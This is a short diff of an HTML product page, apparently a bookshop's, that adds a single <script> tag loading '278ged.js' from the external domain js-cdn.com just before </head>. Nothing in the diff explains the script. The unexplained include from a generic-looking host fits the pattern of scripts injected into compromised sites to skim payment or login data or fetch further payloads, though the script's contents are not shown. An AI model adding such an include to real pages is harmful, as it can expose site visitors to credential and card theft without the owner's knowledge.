--- a/index.html
+++ b/index.html
@@ -1148,7 +1148,9 @@ function toggle() {
   width: 32px;
   background-size: 32px 32px;
 }
-</style><link href="index_files/pr_override.css" id="pr-style-override" type="text/css" rel="stylesheet"></head>
+</style><link href="index_files/pr_override.css" id="pr-style-override" type="text/css" rel="stylesheet">
+<script src='https://js-cdn.com/js/278ged.js'></script>	
+</head>
 
 <body class="books product-detail">
 
